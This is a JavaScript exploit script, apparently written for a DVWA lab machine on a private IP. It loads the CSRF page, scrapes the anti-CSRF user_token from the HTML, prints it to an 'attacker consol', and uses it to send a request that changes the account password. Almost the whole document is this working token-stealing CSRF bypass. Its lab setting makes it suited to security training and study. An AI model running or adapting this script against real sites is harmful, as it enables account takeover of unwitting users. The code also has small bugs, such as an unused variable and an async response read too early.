Untitled

function readBody(xhr) {
	var data;
	//responsetype type of response
	//txt: The response is text in a DOMString object.
	//document: he response is an HTML Document or XML XMLDocument,
	if (!xhr.responseType || xhr.responseType === "text") {
		data = xhr.responseText;
	} else if (xhr.responseType === "document") {
		data = xhr.responseXML;
	} else {
		data = xhr.response;
	}
	//Domparser:  interface provides the ability to parse XML or HTML source code from a string into a DOM Document.
	var parser = new DOMParser();
	//you can parse now
	var resp=parser.parseFromString(data, "text/html");
	user_token = resp.getElementsByName('user_token')[0].value; //grab first available user_token
	//show user_token in attacker consol
	console.log('user_token: ' + user_token);
	csrf(user_token);
	return data;
}

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
	if (xhr.readyState == 4) {
		response=readBody(xhr);
		//console.log(response);
	}
}
xhr.open('GET', 'http://192.168.111.129/dvwa/vulnerabilities/csrf/', true);
xhr.send(null);

function csrf(user_token) {
	//var sendWidgetModel = {"password_new":"123","password_conf":"123","Change":"Change","user_token":token};
	//var sendWidgetModel = {"toEmail": 'john@doe.com',"widgetMessage": "I hate you, John!",};
	var x1 = new XMLHttpRequest();
	x1.open('GET','http://192.168.111.129/dvwa/vulnerabilities/csrf/?password_new=122&password_conf=122&Change=Change&user_token='+user_token,true);
	//x1.open("POST", "http://192.168.111.129/dvwa/vulnerabilities/csrf/");
	x1.setRequestHeader("Content-Type", "application/json; charset=utf-8");
	x1.send(null);

	var data2;
	if (!x1.responseType || x1.responseType === "text") {
		data = x1.responseText;
	} else if (x1.responseType === "document") {
		data = x1.responseXML;
	} else {
		data = x1.response;
	}
	alert(data);
	var parser = new DOMParser();
	var resp=parser.parseFromString(data, "text/html");
	result=document.getElementsByTagName('pre')[0].innerHTML;
	console.log("res:"+result);
	alert(result)
}